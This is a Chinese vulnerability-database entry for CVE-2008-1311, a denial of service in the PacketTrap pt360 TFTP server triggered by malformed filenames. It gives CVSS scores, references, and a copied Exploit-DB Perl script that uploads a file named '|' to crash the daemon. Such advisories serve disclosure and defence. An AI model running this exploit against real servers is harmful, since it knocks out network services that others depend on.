CVE-2008-1311 |
|
发布时间 :2008-03-12 13:44:00 | ||
修订时间 :2011-03-07 22:06:29 | ||||
NMCOE |
[原文]The TFTP server in PacketTrap pt360 Tool Suite PRO 2.0.3901.0 and earlier allows remote attackers to cause a denial of service (daemon hang) by uploading a file named (1) ‘|’ (pipe), (2) ‘”‘ (quotation mark), or (3) “<>” (less than, greater than); or (4) a file with a long name. NOTE: the issue for vector 4 might exist because of an incomplete fix for CVE-2008-1312.
[CNNVD]PacketTrap pt360工具组TFTP服务器远程拒绝服务漏洞(CNNVD-200803-203)
PacketTrap pt360工具组是一款网络管理软件,可提供Cisco配置管理、服务器和应用程序监控、第三方产品集成等功能。
pt360工具组所实现的TFTP服务器处理无效文件名的文件时存在拒绝服务漏洞,导致TFTP组件无法正常运行,用户必须重启整个应用才能恢复。
–
CVSS (基础分值)
CVSS分值: | 5 | [中等(MEDIUM)] |
机密性影响: | NONE | [对系统的机密性无影响] |
完整性影响: | NONE | [不会对系统完整性产生影响] |
可用性影响: | PARTIAL | [可能会导致性能下降或中断资源访问] |
攻击复杂度: | LOW | [漏洞利用没有访问限制 ] |
攻击向量: | NETWORK | [攻击者不需要获取内网访问权或本地访问权] |
身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
CWE-20 | [输入验证不恰当] |
–
CPE (受影响的平台与产品)
产品及版本信息(CPE)暂不可用 |
–
OVAL (用于检测的技术细节)
未找到相关OVAL定义 |
–
官方数据库链接
–
其它链接及资源
http://xforce.iss.net/xforce/xfdb/41073 (UNKNOWN) XF pt360-tftpserver-filename-dos(41073) |
http://www.vupen.com/english/advisories/2008/0811/references (UNKNOWN) VUPEN ADV-2008-0811 |
http://www.securityfocus.com/bid/28187 (UNKNOWN) BID 28187 |
http://www.securityfocus.com/archive/1/archive/1/489355/100/0/threaded (UNKNOWN) BUGTRAQ 20080310 Denial of Service in PacketTrap TFTP server 2.0.3901.0 |
http://securityreason.com/securityalert/3734 (UNKNOWN) SREASON 3734 |
http://secunia.com/advisories/29308 (VENDOR_ADVISORY) SECUNIA 29308 |
http://aluigi.org/testz/tftpx.zip (UNKNOWN) MISC http://aluigi.org/testz/tftpx.zip |
http://aluigi.altervista.org/adv/packettrash-adv.txt (UNKNOWN) MISC http://aluigi.altervista.org/adv/packettrash-adv.txt |
–
漏洞信息
PacketTrap pt360工具组TFTP服务器远程拒绝服务漏洞 | |
中危 | 输入验证 |
2008-03-12 00:00:00 | 2008-09-05 00:00:00 |
远程 | |
PacketTrap pt360工具组是一款网络管理软件,可提供Cisco配置管理、服务器和应用程序监控、第三方产品集成等功能。 pt360工具组所实现的TFTP服务器处理无效文件名的文件时存在拒绝服务漏洞,导致TFTP组件无法正常运行,用户必须重启整个应用才能恢复。 |
–
公告与补丁
目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.packettrap.com/index.html |
–
漏洞信息 (6863)
PacketTrap TFTPD 2.2.5459.0 Remote Denial of Service Exploit (EDBID:6863) |
|
windows | dos |
2008-10-29 | Verified |
0 | Jeremy Brown |
N/A |
[点击下载] |
#!/usr/bin/perl # Jeremy Brown [[email protected]/jbrownsec.blogspot.com] # PacketTrap TFTPD DoS (latest 2.2.5459.0 tested) -- www.packettrap.com # Must have Net::TFTP installed (easy to install, 'cpan' then 'install Net::TFTP' ;) # A product of tftpfuzz.pl (coming soon) use Net::TFTP; use Getopt::Std; $tftp = Net::TFTP->new("192.168.0.112"); $tftp->ascii; $tftp->put("test", "|"); exit; # milw0rm.com [2008-10-29]
–
漏洞信息
42932 |
|
PacketTrap pt360 TFTP Server Crafted Filename Handling Remote DoS | |
Remote / Network Access |
Denial of Service |
Loss of Availability | |
Exploit Public | Uncoordinated Disclosure |
–
漏洞描述
–
时间线
2008-03-08 |
Unknow |
2008-03-08 | Unknow |
–
解决方案
OSVDB is not aware of a solution for this vulnerability. |
–
相关参考
|
–
漏洞作者
Unknown or Incomplete |